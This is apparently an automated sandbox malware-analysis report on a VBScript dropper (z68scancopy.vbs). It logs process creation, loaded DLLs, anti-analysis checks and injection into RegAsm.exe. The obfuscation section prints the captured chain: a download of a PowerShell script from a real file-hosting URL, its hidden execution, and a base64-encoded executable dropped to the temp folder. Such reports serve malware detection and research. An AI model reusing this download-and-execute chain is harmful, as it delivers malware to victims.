            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02E57E54 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02E8F290 appears 105 times
            Source: z68scancopy.vbs Initial sample: Strings found which are bigger than 50
            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: x.exe.4.dr, AesUtilities.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.1d89066c238.0.raw.unpack, AesUtilities.cs Cryptographic APIs: 'CreateDecryptor'
            Source: classification engine Classification label: mal100.spre.troj.expl.evad.winVBS@8/7@1/1
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\q8ynky[1].ps1
            Source: C:\Users\user\AppData\Local\Temp\x.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
            Source: C:\Windows\System32\wscript.exe File created: C:\Temp\dddddd.ps1
            Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs"
            Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: z68scancopy.vbs ReversingLabs: Detection: 21%
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "https://files.catbox.moe/q8ynky.ps1", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.FileExists("C:\Temp\dddddd.ps1");IFileSystem3.CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.", "0", "true")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAO
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB44282D push esp; ret 4_2_00007FFAAB442912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004020CB push 714A2200h; ret 7_2_004020E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041E960 push eax; iretd 7_2_0041E961
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004159D3 push es; retf 54F1h7_2_00415A1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004122C0 push 91881475h; iretd 7_2_004122D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004032D0 push eax; ret 7_2_004032D2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040AAF2 push es; iretd 7_2_0040AB09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404A95 push esi; iretd 7_2_00404AAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404AA3 push esi; iretd 7_2_00404AAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004122A6 push 91881475h; iretd 7_2_004122D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004015F3 push 6F58A9ABh; retf 7_2_004015FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004105FB push es; retf 7_2_004105FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00411623 push esi; iretd 7_2_004116D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418FF6 push es; ret 7_2_0041904A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E009AD push ecx; mov dword ptr [esp], ecx7_2_02E009B6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2750000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 27B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 47B0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E2BBA0 rdtsc
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2773
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3677
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7864 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: wscript.exe, 00000000.00000003.1452378172.0000023359D7A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
            Source: wscript.exe, 00000000.00000002.1454166302.0000023359D05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452614368.0000023357BC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1452378172.0000023359D7A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: wscript.exe, 00000000.00000002.1453923296.0000023357BA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357B9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452614368.0000023357BA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnpx
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00417713 LdrLoadDll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E102E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02DFB2D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02ED52E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EBF2F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02DF92FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E0A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E092C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E2F2D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E102A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E152A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E972A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E962A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EC92A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E892BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E892BC mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E3E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E80283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02ED5283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E3329E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E04260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02ECD26B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02DFA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E41270 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E29274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02DF9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EB0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E3724D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02DF826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E06259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EBB256 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02ED5227 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02DF823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E37208 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E103E9 mov eax, dword ptr fs:[00000030h]
